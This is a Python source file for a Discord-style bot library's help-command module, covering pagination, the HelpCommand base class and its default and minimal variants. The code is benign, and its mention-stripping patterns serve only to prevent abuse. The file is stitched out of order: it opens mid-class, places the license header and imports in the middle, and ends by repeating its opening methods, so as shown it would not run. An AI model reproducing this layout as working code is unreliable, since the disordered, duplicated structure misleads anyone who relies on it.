@property def clean_params(self): result = self.params.copy() try: del result[next(iter(result))] except StopIteration: raise ValueError('Missing context parameter') from None else: return result def _inject_into_cog(self, cog): # Warning: hacky # Make the cog think that get_commands returns this command # as well if we inject it without modifying __cog_commands__ # since that's used for the injection and ejection of cogs. def wrapped_get_commands(*, _original=cog.get_commands): ret = _original() ret.append(self) return ret # Ditto here def wrapped_walk_commands(*, _original=cog.walk_commands): yield from _original() yield self functools.update_wrapper(wrapped_get_commands, cog.get_commands) functools.update_wrapper(wrapped_walk_commands, cog.walk_commands) cog.get_commands = wrapped_get_commands cog.walk_commands = wrapped_walk_commands self.cog = cog def _eject_cog(self): if self.cog is None: return # revert back into their original methods cog = self.cog cog.get_commands = cog.get_commands.__wrapped__ cog.walk_commands = cog.walk_commands.__wrapped__ self.cog = None class HelpCommand: r"""The base implementation for help command formatting. .. 
    note::

        Internally instances of this class are deep copied every time
        the command itself is invoked to prevent a race condition
        mentioned in :issue:`2123`.

        This means that relying on the state of this class to be
        the same between command invocations would not work as expected.

    Attributes
    ------------
    context: Optional[:class:`Context`]
        The context that invoked this help formatter. This is generally set after
        the assigned help command, :func:`command_callback`\, has been called.
    show_hidden: :class:`bool`
        Specifies if hidden commands should be shown in the output.
        Defaults to ``False``.
    verify_checks: Optional[:class:`bool`]
        Specifies if commands should have their :attr:`.Command.checks` called
        and verified. If ``True``, always calls :attr:`.Command.checks`.
        If ``None``, only calls :attr:`.Command.checks` in a guild setting.
        If ``False``, never calls :attr:`.Command.checks`. Defaults to ``True``.

        .. versionchanged:: 1.7
    command_attrs: :class:`dict`
        A dictionary of options to pass in for the construction of the help command.
        This allows you to change the command behaviour without actually changing
        the implementation of the command. The attributes will be the same as the
        ones passed in the :class:`.Command` constructor.
    """

    MENTION_TRANSFORMS = {
        '@everyone': '@\u200beveryone',
        '@here': '@\u200bhere',
        r'<@!?[0-9]{17,22}>': '@deleted-user',
        r'<@&[0-9]{17,22}>': '@deleted-role',
    }

    MENTION_PATTERN = re.compile('|'.join(MENTION_TRANSFORMS.keys()))

    def __new__(cls, *args, **kwargs):
        # To prevent race conditions on a single instance, while still allowing
        # settings to be passed, the original arguments must be stored so that
        # copies can be made when the help command is actually called.
        # See issue 2123.
        self = super().__new__(cls)

        # Shallow copies cannot be used in this case since it is not unusual to pass
        # instances that need state, e.g. a Paginator, into the constructor.
        # The keys can safely be copied as-is since they are almost certainly
        # string keys.
        deepcopy = copy.deepcopy
        self.__original_kwargs__ = {k: deepcopy(v) for k, v in kwargs.items()}
        self.__original_args__ = deepcopy(args)
        return self

    def __init__(self, **options):
        self.show_hidden = options.pop('show_hidden', False)
        self.verify_checks = options.pop('verify_checks', True)
        self.command_attrs = attrs = options.pop('command_attrs', {})
        attrs.setdefault('name', 'help')
        attrs.setdefault('help', 'Shows this message')
        self.context: Context = fosscord.utils.MISSING
        self._command_impl = _HelpCommandImpl(self, **self.command_attrs)

    def copy(self):
        obj = self.__class__(*self.__original_args__, **self.__original_kwargs__)
        obj._command_impl = self._command_impl
        return obj

    def _add_to_bot(self, bot):
        command = _HelpCommandImpl(self, **self.command_attrs)
        bot.add_command(command)
        self._command_impl = command

    def _remove_from_bot(self, bot):
        bot.remove_command(self._command_impl.name)
        self._command_impl._eject_cog()

    def add_check(self, func):
        """
        Adds a check to the help command.

        .. versionadded:: 1.4

        Parameters
        ----------
        func
            The function that will be used as a check.
        """
        self._command_impl.add_check(func)

    def remove_check(self, func):
        """
        Removes a check from the help command.

        This function is idempotent and will not raise an exception if
        the function is not in the command's checks.

        .. versionadded:: 1.4

        Parameters
        ----------
        func
            The function to remove from the checks.
""" self._command_impl.remove_check(func) def get_bot_mapping(self): """Retrieves the bot mapping passed to :meth:`send_bot_help`.""" bot = self.context.bot mapping = {cog: cog.get_commands() for cog in bot.cogs.values()} mapping[None] = [c for c in bot.commands if c.cog is None] return mapping @property def invoked_with(self): """Similar to :attr:`Context.invoked_with` except properly handles the case where :meth:`Context.send_help` is used. If the help command was used regularly then this returns the :attr:`Context.invoked_with` attribute. Otherwise, if it the help command was called using :meth:`Context.send_help` then it returns the internal command name of the help command. Returns --------- :class:`str` The command name that triggered this invocation. """ command_name = self._command_impl.name ctx = self.context if ctx is None or ctx.command is None or ctx.command.qualified_name != command_name: return command_name return ctx.invoked_with def get_command_signature(self, command): """Retrieves the signature portion of the help page. Parameters ------------ command: :class:`Command` The command to get the signature of. Returns -------- :class:`str` The signature for the command. """ parent = command.parent entries = [] while parent is not None: if not parent.signature or parent.invoke_without_command: entries.append(parent.name) else: entries.append(parent.name + ' ' + parent.signature) parent = parent.parent parent_sig = ' '.join(reversed(entries)) if len(command.aliases) > 0: aliases = '|'.join(command.aliases) fmt = f'[{command.name}|{aliases}]' if parent_sig: fmt = parent_sig + ' ' + fmt alias = fmt else: alias = command.name if not parent_sig else parent_sig + ' ' + command.name return f'{self.context.clean_prefix}{alias} {command.signature}' def remove_mentions(self, string): """Removes mentions from the string to prevent abuse. This includes ``@everyone``, ``@here``, member mentions and role mentions. Returns ------- :class:`str` The string with mentions removed. """ def replace(obj, *, transforms=self.MENTION_TRANSFORMS): return transforms.get(obj.group(0), '@invalid') return self.MENTION_PATTERN.sub(replace, string) @property def cog(self): """A property for retrieving or setting the cog for the help command. When a cog is set for the help command, it is as-if the help command belongs to that cog. All cog special methods will apply to the help command and it will be automatically unset on unload. To unbind the cog from the help command, you can set it to ``None``. Returns -------- Optional[:class:`Cog`] The cog that is currently set for the help command. """ return self._command_impl.cog @cog.setter def cog(self, cog): # Remove whatever cog is currently valid, if any self._command_impl._eject_cog() # If a new cog is set then inject it. if cog is not None: self._command_impl._inject_into_cog(cog) def command_not_found(self, string): """|maybecoro| A method called when a command is not found in the help command. This is useful to override for i18n. Defaults to ``No command called {0} found.`` Parameters ------------ string: :class:`str` The string that contains the invalid command. Note that this has had mentions removed to prevent abuse. Returns --------- :class:`str` The string to use when a command has not been found. """ return f'No command called "{string}" found.' def subcommand_not_found(self, command, string): """|maybecoro| A method called when a command did not have a subcommand requested in the help command. This is useful to override for i18n. 
        Defaults to either:

        - ``'Command "{command.qualified_name}" has no subcommands.'``
            - If there is no subcommand in the ``command`` parameter.
        - ``'Command "{command.qualified_name}" has no subcommand named {string}'``
            - If the ``command`` parameter has subcommands but not one named ``string``.

        Parameters
        ------------
        command: :class:`Command`
            The command that did not have the subcommand requested.
        string: :class:`str`
            The string that contains the invalid subcommand. Note that this has
            had mentions removed to prevent abuse.

        Returns
        ---------
        :class:`str`
            The string to use when the command did not have the subcommand requested.
        """
        if isinstance(command, Group) and len(command.all_commands) > 0:
            return f'Command "{command.qualified_name}" has no subcommand named {string}'
        return f'Command "{command.qualified_name}" has no subcommands.'

    async def filter_commands(self, commands, *, sort=False, key=None):
        """|coro|

        Returns a filtered list of commands and optionally sorts them.

        This takes into account the :attr:`verify_checks` and :attr:`show_hidden`
        attributes.

        Parameters
        ------------
        commands: Iterable[:class:`Command`]
            An iterable of commands that are getting filtered.
        sort: :class:`bool`
            Whether to sort the result.
        key: Optional[Callable[:class:`Command`, Any]]
            An optional key function to pass to :func:`py:sorted` that
            takes a :class:`Command` as its sole parameter. If ``sort`` is
            passed as ``True`` then this defaults to the command name.

        Returns
        ---------
        List[:class:`Command`]
            A list of commands that passed the filter.
        """
        if sort and key is None:
            key = lambda c: c.name

        iterator = commands if self.show_hidden else filter(lambda c: not c.hidden, commands)

        if self.verify_checks is False:
            # if we do not need to verify the checks then we can just
            # run it straight through normally without using await.
            return sorted(iterator, key=key) if sort else list(iterator)

        if self.verify_checks is None and not self.context.guild:
            # if verify_checks is None and we're in a DM, don't verify
            return sorted(iterator, key=key) if sort else list(iterator)

        # if we're here then we need to check whether every command can run
        async def predicate(cmd):
            try:
                return await cmd.can_run(self.context)
            except CommandError:
                return False

        ret = []
        for cmd in iterator:
            valid = await predicate(cmd)
            if valid:
                ret.append(cmd)

        if sort:
            ret.sort(key=key)
        return ret

    def get_max_size(self, commands):
        """Returns the largest name length of the specified command list.

        Parameters
        ------------
        commands: Sequence[:class:`Command`]
            A sequence of commands to check for the largest size.

        Returns
        --------
        :class:`int`
            The maximum width of the commands.
        """
        as_lengths = (fosscord.utils._string_width(c.name) for c in commands)
        return max(as_lengths, default=0)

    def get_destination(self):
        """Returns the :class:`~fosscord.abc.Messageable` where the help command will be output.

        You can override this method to customise the behaviour.

        By default this returns the context's channel.

        Returns
        -------
        :class:`.abc.Messageable`
            The destination where the help command will be output.
        """
        return self.context.channel

    async def send_error_message(self, error):
        """|coro|

        Handles the implementation when an error happens in the help command.
        For example, the result of :meth:`command_not_found` will be passed here.

        You can override this method to customise the behaviour.

        By default, this sends the error message to the destination
        specified by :meth:`get_destination`.

        .. note::

            You can access the invocation context with :attr:`HelpCommand.context`.
        Parameters
        ------------
        error: :class:`str`
            The error message to display to the user. Note that this has
            had mentions removed to prevent abuse.
        """
        destination = self.get_destination()
        await destination.send(error)

    @_not_overriden
    async def on_help_command_error(self, ctx, error):
        """|coro|

        The help command's error handler, as specified by :ref:`ext_commands_error_handler`.

        Useful to override if you need some specific behaviour when the error handler
        is called.

        By default this method does nothing and just propagates to the default
        error handlers.

        Parameters
        ------------
        ctx: :class:`Context`
            The invocation context.
        error: :class:`CommandError`
            The error that was raised.
        """
        pass

    async def send_bot_help(self, mapping):
        """|coro|

        Handles the implementation of the bot command page in the help command.
        This function is called when the help command is called with no arguments.

        It should be noted that this method does not return anything -- rather the
        actual message sending should be done inside this method. Well-behaved subclasses
        should use :meth:`get_destination` to know where to send, as this is a customisation
        point for other users.

        You can override this method to customise the behaviour.

        .. note::

            You can access the invocation context with :attr:`HelpCommand.context`.

            Also, the commands in the mapping are not filtered. To do the filtering
            you will have to call :meth:`filter_commands` yourself.

        Parameters
        ------------
        mapping: Mapping[Optional[:class:`Cog`], List[:class:`Command`]]
            A mapping of cogs to commands that have been requested by the user
            for help. The key of the mapping is the :class:`~.commands.Cog` that
            the command belongs to, or ``None`` if there isn't one, and the value is
            a list of commands that belong to that cog.
        """
        return None

    async def send_cog_help(self, cog):
        """|coro|

        Handles the implementation of the cog page in the help command.
        This function is called when the help command is called with a cog as the argument.

        It should be noted that this method does not return anything -- rather the
        actual message sending should be done inside this method. Well-behaved subclasses
        should use :meth:`get_destination` to know where to send, as this is a customisation
        point for other users.

        You can override this method to customise the behaviour.

        .. note::

            You can access the invocation context with :attr:`HelpCommand.context`.

            To get the commands that belong to this cog see :meth:`Cog.get_commands`.
            The commands returned are not filtered. To do the filtering you will have to call
            :meth:`filter_commands` yourself.

        Parameters
        -----------
        cog: :class:`Cog`
            The cog that was requested for help.
        """
        return None

    async def send_group_help(self, group):
        """|coro|

        Handles the implementation of the group page in the help command.
        This function is called when the help command is called with a group as the argument.

        It should be noted that this method does not return anything -- rather the
        actual message sending should be done inside this method. Well-behaved subclasses
        should use :meth:`get_destination` to know where to send, as this is a customisation
        point for other users.

        You can override this method to customise the behaviour.

        .. note::

            You can access the invocation context with :attr:`HelpCommand.context`.

            To get the commands that belong to this group without aliases see
            :attr:`Group.commands`. The commands returned are not filtered. To do the
            filtering you will have to call :meth:`filter_commands` yourself.

        Parameters
        -----------
        group: :class:`Group`
            The group that was requested for help.
""" return None async def send_command_help(self, command): """|coro| Handles the implementation of the single command page in the help command. It should be noted that this method does not return anything -- rather the actual message sending should be done inside this method. Well behaved subclasses should use :meth:`get_destination` to know where to send, as this is a customisation point for other users. You can override this method to customise the behaviour. .. note:: You can access the invocation context with :attr:`HelpCommand.context`. .. admonition:: Showing Help :class: helpful There are certain attributes and methods that are helpful for a help command to show such as the following: - :attr:`Command.help` - :attr:`Command.brief` - :attr:`Command.short_doc` - :attr:`Command.description` - :meth:`get_command_signature` There are more than just these attributes but feel free to play around with these to help you get started to get the output that you want. Parameters ----------- command: :class:`Command` The command that was requested for help. """ return None async def prepare_help_command(self, ctx, command=None): """|coro| A low level method that can be used to prepare the help command before it does anything. For example, if you need to prepare some state in your subclass before the command does its processing then this would be the place to do it. The default implementation does nothing. .. note:: This is called *inside* the help command callback body. So all the usual rules that happen inside apply here as well. Parameters ----------- ctx: :class:`Context` The invocation context. command: Optional[:class:`str`] The argument passed to the help command. """ pass async def command_callback(self, ctx, *, command=None): """|coro| The actual implementation of the help command. It is not recommended to override this method and instead change the behaviour through the methods that actually get dispatched. - :meth:`send_bot_help` - :meth:`send_cog_help` - :meth:`send_group_help` - :meth:`send_command_help` - :meth:`get_destination` - :meth:`command_not_found` - :meth:`subcommand_not_found` - :meth:`send_error_message` - :meth:`on_help_command_error` - :meth:`prepare_help_command` """ await self.prepare_help_command(ctx, command) bot = ctx.bot if command is None: mapping = self.get_bot_mapping() return await self.send_bot_help(mapping) # Check if it's a cog cog = bot.get_cog(command) if cog is not None: return await self.send_cog_help(cog) maybe_coro = fosscord.utils.maybe_coroutine # If it's not a cog then it's a command. # Since we want to have detailed errors when someone # passes an invalid subcommand, we need to walk through # the command group chain ourselves. keys = command.split(' ') cmd = bot.all_commands.get(keys[0]) if cmd is None: string = await maybe_coro(self.command_not_found, self.remove_mentions(keys[0])) return await self.send_error_message(string) for key in keys[1:]: try: found = cmd.all_commands.get(key) except AttributeError: string = await maybe_coro(self.subcommand_not_found, cmd, self.remove_mentions(key)) return await self.send_error_message(string) else: if found is None: string = await maybe_coro(self.subcommand_not_found, cmd, self.remove_mentions(key)) return await self.send_error_message(string) cmd = found if isinstance(cmd, Group): return await self.send_group_help(cmd) else: return await self.send_command_help(cmd) class DefaultHelpCommand(HelpCommand): """The implementation of the default help command. This inherits from :class:`HelpCommand`. 
    It extends it with the following attributes.

    Attributes
    ------------
    width: :class:`int`
        The maximum number of characters that fit in a line.
        Defaults to 80.
    sort_commands: :class:`bool`
        Whether to sort the commands in the output alphabetically. Defaults to ``True``.
    dm_help: Optional[:class:`bool`]
        A tribool that indicates if the help command should DM the user instead of
        sending it to the channel it received it from. If the boolean is set to
        ``True``, then all help output is DM'd. If ``False``, none of the help
        output is DM'd. If ``None``, then the bot will only DM when the help
        message becomes too long (dictated by more than :attr:`dm_help_threshold` characters).
        Defaults to ``False``.
    dm_help_threshold: Optional[:class:`int`]
        The number of characters the paginator must accumulate before getting DM'd to the
        user if :attr:`dm_help` is set to ``None``. Defaults to 1000.
    indent: :class:`int`
        How much to indent the commands from a heading. Defaults to ``2``.
    commands_heading: :class:`str`
        The command list's heading string used when the help command is invoked with a category name.
        Useful for i18n. Defaults to ``"Commands:"``
    no_category: :class:`str`
        The string used when there is a command which does not belong to any category(cog).
        Useful for i18n. Defaults to ``"No Category"``
    paginator: :class:`Paginator`
        The paginator used to paginate the help command output.
    """

    def __init__(self, **options):
        self.width = options.pop('width', 80)
        self.indent = options.pop('indent', 2)
        self.sort_commands = options.pop('sort_commands', True)
        self.dm_help = options.pop('dm_help', False)
        self.dm_help_threshold = options.pop('dm_help_threshold', 1000)
        self.commands_heading = options.pop('commands_heading', "Commands:")
        self.no_category = options.pop('no_category', 'No Category')
        self.paginator = options.pop('paginator', None)

        if self.paginator is None:
            self.paginator = Paginator()

        super().__init__(**options)

    def shorten_text(self, text):
        """:class:`str`: Shortens text to fit into the :attr:`width`."""
        if len(text) > self.width:
            return text[:self.width - 3].rstrip() + '...'
        return text

    def get_ending_note(self):
        """:class:`str`: Returns the help command's ending note. This is mainly useful to override for i18n purposes."""
        command_name = self.invoked_with
        return (
            f"Type {self.context.clean_prefix}{command_name} command for more info on a command.\n"
            f"You can also type {self.context.clean_prefix}{command_name} category for more info on a category."
        )

    def add_indented_commands(self, commands, *, heading, max_size=None):
        """Indents a list of commands after the specified heading.

        The formatting is added to the :attr:`paginator`.

        The default implementation is the command name indented by
        :attr:`indent` spaces, padded to ``max_size`` followed by
        the command's :attr:`Command.short_doc` and then shortened
        to fit into the :attr:`width`.

        Parameters
        -----------
        commands: Sequence[:class:`Command`]
            A list of commands to indent for output.
        heading: :class:`str`
            The heading to add to the output. This is only added
            if the list of commands is non-empty.
        max_size: Optional[:class:`int`]
            The max size to use for the gap between indents.
            If unspecified, calls :meth:`~HelpCommand.get_max_size` on the
            commands parameter.
""" if not commands: return self.paginator.add_line(heading) max_size = max_size or self.get_max_size(commands) get_width = fosscord.utils._string_width for command in commands: name = command.name width = max_size - (get_width(name) - len(name)) entry = f'{self.indent * ' '}{name:<{width}} {command.short_doc}' self.paginator.add_line(self.shorten_text(entry)) async def send_pages(self): """A helper utility to send the page output from :attr:`paginator` to the destination.""" destination = self.get_destination() for page in self.paginator.pages: await destination.send(page) def add_command_formatting(self, command): """A utility function to format the non-indented block of commands and groups. Parameters ------------ command: :class:`Command` The command to format. """ if command.description: self.paginator.add_line(command.description, empty=True) signature = self.get_command_signature(command) self.paginator.add_line(signature, empty=True) if command.help: try: self.paginator.add_line(command.help, empty=True) except RuntimeError: for line in command.help.splitlines(): self.paginator.add_line(line) self.paginator.add_line() def get_destination(self): ctx = self.context if self.dm_help is True: return ctx.author elif self.dm_help is None and len(self.paginator) > self.dm_help_threshold: return ctx.author else: return ctx.channel async def prepare_help_command(self, ctx, command): self.paginator.clear() await super().prepare_help_command(ctx, command) async def send_bot_help(self, mapping): ctx = self.context bot = ctx.bot if bot.description: # <description> portion self.paginator.add_line(bot.description, empty=True) no_category = f'\u200b{self.no_category}:' def get_category(command, *, no_category=no_category): cog = command.cog return cog.qualified_name + ':' if cog is not None else no_category filtered = await self.filter_commands(bot.commands, sort=True, key=get_category) max_size = self.get_max_size(filtered) to_iterate = itertools.groupby(filtered, key=get_category) # Now we can add the commands to the page. for category, commands in to_iterate: commands = sorted(commands, key=lambda c: c.name) if self.sort_commands else list(commands) self.add_indented_commands(commands, heading=category, max_size=max_size) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_command_help(self, command): self.add_command_formatting(command) self.paginator.close_page() await self.send_pages() async def send_group_help(self, group): self.add_command_formatting(group) filtered = await self.filter_commands(group.commands, sort=self.sort_commands) self.add_indented_commands(filtered, heading=self.commands_heading) if filtered: note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_cog_help(self, cog): if cog.description: self.paginator.add_line(cog.description, empty=True) filtered = await self.filter_commands(cog.get_commands(), sort=self.sort_commands) self.add_indented_commands(filtered, heading=self.commands_heading) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() class MinimalHelpCommand(HelpCommand): """An implementation of a help command with minimal output. This inherits from :class:`HelpCommand`. Attributes ------------ sort_commands: :class:`bool` Whether to sort the commands in the output alphabetically. Defaults to ``True``. 
    commands_heading: :class:`str`
        The command list's heading string used when the help command is invoked with a category name.
        Useful for i18n. Defaults to ``"Commands"``
    aliases_heading: :class:`str`
        The alias list's heading string used to list the aliases of the command. Useful for i18n.
        Defaults to ``"Aliases:"``.
    dm_help: Optional[:class:`bool`]
        A tribool that indicates if the help command should DM the user instead of
        sending it to the channel it received it from. If the boolean is set to
        ``True``, then all help output is DM'd. If ``False``, none of the help
        output is DM'd. If ``None``, then the bot will only DM when the help
        message becomes too long (dictated by more than :attr:`dm_help_threshold` characters).
        Defaults to ``False``.
    dm_help_threshold: Optional[:class:`int`]
        The number of characters the paginator must accumulate before getting DM'd to the
        user if :attr:`dm_help` is set to ``None``. Defaults to 1000.
    no_category: :class:`str`
        The string used when there is a command which does not belong to any category(cog).
        Useful for i18n. Defaults to ``"No Category"``
    paginator: :class:`Paginator`
        The paginator used to paginate the help command output.
    """

    def __init__(self, **options):
        self.sort_commands = options.pop('sort_commands', True)
        self.commands_heading = options.pop('commands_heading', "Commands")
        self.dm_help = options.pop('dm_help', False)
        self.dm_help_threshold = options.pop('dm_help_threshold', 1000)
        self.aliases_heading = options.pop('aliases_heading', "Aliases:")
        self.no_category = options.pop('no_category', 'No Category')
        self.paginator = options.pop('paginator', None)

        if self.paginator is None:
            self.paginator = Paginator(suffix=None, prefix=None)

        super().__init__(**options)

    async def send_pages(self):
        """A helper utility to send the page output from :attr:`paginator` to the destination."""
        destination = self.get_destination()
        for page in self.paginator.pages:
            await destination.send(page)

    def get_opening_note(self):
        """Returns the help command's opening note. This is mainly useful to override for i18n purposes.

        The default implementation returns ::

            Use `{prefix}{command_name} [command]` for more info on a command.
            You can also use `{prefix}{command_name} [category]` for more info on a category.

        Returns
        -------
        :class:`str`
            The help command opening note.
        """
        command_name = self.invoked_with
        return (
            f"Use `{self.context.clean_prefix}{command_name} [command]` for more info on a command.\n"
            f"You can also use `{self.context.clean_prefix}{command_name} [category]` for more info on a category."
        )

    def get_command_signature(self, command):
        return f'{self.context.clean_prefix}{command.qualified_name} {command.signature}'

    def get_ending_note(self):
        """Returns the help command's ending note. This is mainly useful to override for i18n purposes.

        The default implementation returns ``None``.

        Returns
        -------
        Optional[:class:`str`]
            The help command ending note.
        """
        return None

    def add_bot_commands_formatting(self, commands, heading):
        """Adds the minified bot heading with commands to the output.

        The formatting should be added to the :attr:`paginator`.

        The default implementation is a bold underline heading followed
        by commands separated by an EN SPACE (U+2002) in the next line.

        Parameters
        -----------
        commands: Sequence[:class:`Command`]
            A list of commands that belong to the heading.
        heading: :class:`str`
            The heading to add to the line.
""" if commands: # U+2002 Middle Dot joined = '\u2002'.join(c.name for c in commands) self.paginator.add_line(f'__**{heading}**__') self.paginator.add_line(joined) def add_subcommand_formatting(self, command): """Adds formatting information on a subcommand. The formatting should be added to the :attr:`paginator`. The default implementation is the prefix and the :attr:`Command.qualified_name` optionally followed by an En dash and the command's :attr:`Command.short_doc`. Parameters ----------- command: :class:`Command` The command to show information of. """ fmt = '{0}{1} \N{EN DASH} {2}' if command.short_doc else '{0}{1}' self.paginator.add_line(fmt.format(self.context.clean_prefix, command.qualified_name, command.short_doc)) def add_aliases_formatting(self, aliases): """Adds the formatting information on a command's aliases. The formatting should be added to the :attr:`paginator`. The default implementation is the :attr:`aliases_heading` bolded followed by a comma separated list of aliases. This is not called if there are no aliases to format. Parameters ----------- aliases: Sequence[:class:`str`] A list of aliases to format. """ self.paginator.add_line(f'**{self.aliases_heading}** {', '.join(aliases)}', empty=True) def add_command_formatting(self, command): """A utility function to format commands and groups. Parameters ------------ command: :class:`Command` The command to format. """ if command.description: self.paginator.add_line(command.description, empty=True) signature = self.get_command_signature(command) if command.aliases: self.paginator.add_line(signature) self.add_aliases_formatting(command.aliases) else: self.paginator.add_line(signature, empty=True) if command.help: try: self.paginator.add_line(command.help, empty=True) except RuntimeError: for line in command.help.splitlines(): self.paginator.add_line(line) self.paginator.add_line() def get_destination(self): ctx = self.context if self.dm_help is True: return ctx.author elif self.dm_help is None and len(self.paginator) > self.dm_help_threshold: return ctx.author else: return ctx.channel async def prepare_help_command(self, ctx, command): self.paginator.clear() await super().prepare_help_command(ctx, command) async def send_bot_help(self, mapping): ctx = self.context bot = ctx.bot if bot.description: self.paginator.add_line(bot.description, empty=True) note = self.get_opening_note() if note: self.paginator.add_line(note, empty=True) no_category = f'\u200b{self.no_category}' def get_category(command, *, no_category=no_category): cog = command.cog return cog.qualified_name if cog is not None else no_category filtered = await self.filter_commands(bot.commands, sort=True, key=get_category) to_iterate = itertools.groupby(filtered, key=get_category) for category, commands in to_iterate: commands = sorted(commands, key=lambda c: c.name) if self.sort_commands else list(commands) self.add_bot_commands_formatting(commands, category) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_cog_help(self, cog): bot = self.context.bot if bot.description: self.paginator.add_line(bot.description, empty=True) note = self.get_opening_note() if note: self.paginator.add_line(note, empty=True) if cog.description: self.paginator.add_line(cog.description, empty=True) filtered = await self.filter_commands(cog.get_commands(), sort=self.sort_commands) if filtered: self.paginator.add_line(f'**{cog.qualified_name} {self.commands_heading}**') for command in filtered: 
self.add_subcommand_formatting(command) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_group_help(self, group): self.add_command_formatting(group) filtered = await self.filter_commands(group.commands, sort=self.sort_commands) if filtered: note = self.get_opening_note() if note: self.paginator.add_line(note, empty=True) self.paginator.add_line(f'**{self.commands_heading}**') for command in filtered: self.add_subcommand_formatting(command) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_command_help(self, command): self.add_command_formatting(command) self.paginator.close_page() await self.send_pages()
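# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the library itself). A minimal
# example of wiring one of the help commands above into a bot, assuming the
# usual ``fosscord.ext.commands.Bot`` entry point; the subclass name, prefix,
# and token placeholder below are hypothetical.
#
#     from fosscord.ext import commands
#
#     class BrandedHelp(commands.MinimalHelpCommand):
#         def get_opening_note(self):
#             # get_opening_note must return a str; see the docstring above.
#             return 'Need a hand? These are the commands I understand.'
#
#     bot = commands.Bot(command_prefix='!', help_command=BrandedHelp())
#     bot.run('YOUR_TOKEN_HERE')
#
# Passing ``help_command=None`` instead would remove the default help command
# entirely, which is the usual way to opt out of this module's behaviour.
# ---------------------------------------------------------------------------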
""" The MIT License (MIT) Copyright (c) 2015-present Rapptz Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import itertools import copy import functools import inspect import re from typing import Optional, TYPE_CHECKING import fosscord.utils from .core import Group, Command from .errors import CommandError if TYPE_CHECKING: from .context import Context __all__ = ( 'Paginator', 'HelpCommand', 'DefaultHelpCommand', 'MinimalHelpCommand', ) # help -> shows info of bot on top/bottom and lists subcommands # help command -> shows detailed info of command # help command <subcommand chain> -> same as above # <description> # <command signature with aliases> # <long doc> # Cog: # <command> <shortdoc> # <command> <shortdoc> # Other Cog: # <command> <shortdoc> # No Category: # <command> <shortdoc> # Type <prefix>help command for more info on a command. # You can also type <prefix>help category for more info on a category. class Paginator: """A class that aids in paginating code blocks for Fosscord messages. .. container:: operations .. describe:: len(x) Returns the total number of characters in the paginator. Attributes ----------- prefix: :class:`str` The prefix inserted to every page. e.g. three backticks. suffix: :class:`str` The suffix appended at the end of every page. e.g. three backticks. max_size: :class:`int` The maximum amount of codepoints allowed in a page. linesep: :class:`str` The character string inserted between lines. e.g. a newline character. .. versionadded:: 1.7 """ def __init__(self, prefix='```', suffix='```', max_size=2000, linesep='\n'): self.prefix = prefix self.suffix = suffix self.max_size = max_size self.linesep = linesep self.clear() def clear(self): """Clears the paginator to have no pages.""" if self.prefix is not None: self._current_page = [self.prefix] self._count = len(self.prefix) + self._linesep_len # prefix + newline else: self._current_page = [] self._count = 0 self._pages = [] @property def _prefix_len(self): return len(self.prefix) if self.prefix else 0 @property def _suffix_len(self): return len(self.suffix) if self.suffix else 0 @property def _linesep_len(self): return len(self.linesep) def add_line(self, line='', *, empty=False): """Adds a line to the current page. If the line exceeds the :attr:`max_size` then an exception is raised. Parameters ----------- line: :class:`str` The line to add. empty: :class:`bool` Indicates if another empty line should be added. Raises ------ RuntimeError The line was too big for the current :attr:`max_size`. 
""" max_page_size = self.max_size - self._prefix_len - self._suffix_len - 2 * self._linesep_len if len(line) > max_page_size: raise RuntimeError(f'Line exceeds maximum page size {max_page_size}') if self._count + len(line) + self._linesep_len > self.max_size - self._suffix_len: self.close_page() self._count += len(line) + self._linesep_len self._current_page.append(line) if empty: self._current_page.append('') self._count += self._linesep_len def close_page(self): """Prematurely terminate a page.""" if self.suffix is not None: self._current_page.append(self.suffix) self._pages.append(self.linesep.join(self._current_page)) if self.prefix is not None: self._current_page = [self.prefix] self._count = len(self.prefix) + self._linesep_len # prefix + linesep else: self._current_page = [] self._count = 0 def __len__(self): total = sum(len(p) for p in self._pages) return total + self._count @property def pages(self): """List[:class:`str`]: Returns the rendered list of pages.""" # we have more than just the prefix in our current page if len(self._current_page) > (0 if self.prefix is None else 1): self.close_page() return self._pages def __repr__(self): fmt = '<Paginator prefix: {0.prefix!r} suffix: {0.suffix!r} linesep: {0.linesep!r} max_size: {0.max_size} count: {0._count}>' return fmt.format(self) def _not_overriden(f): f.__help_command_not_overriden__ = True return f class _HelpCommandImpl(Command): def __init__(self, inject, *args, **kwargs): super().__init__(inject.command_callback, *args, **kwargs) self._original = inject self._injected = inject async def prepare(self, ctx): self._injected = injected = self._original.copy() injected.context = ctx self.callback = injected.command_callback on_error = injected.on_help_command_error if not hasattr(on_error, '__help_command_not_overriden__'): if self.cog is not None: self.on_error = self._on_error_cog_implementation else: self.on_error = on_error await super().prepare(ctx) async def _parse_arguments(self, ctx): # Make the parser think we don't have a cog so it doesn't # inject the parameter into `ctx.args`. original_cog = self.cog self.cog = None try: await super()._parse_arguments(ctx) finally: self.cog = original_cog async def _on_error_cog_implementation(self, dummy, ctx, error): await self._injected.on_help_command_error(ctx, error) @property def clean_params(self): result = self.params.copy() try: del result[next(iter(result))] except StopIteration: raise ValueError('Missing context parameter') from None else: return result def _inject_into_cog(self, cog): # Warning: hacky # Make the cog think that get_commands returns this command # as well if we inject it without modifying __cog_commands__ 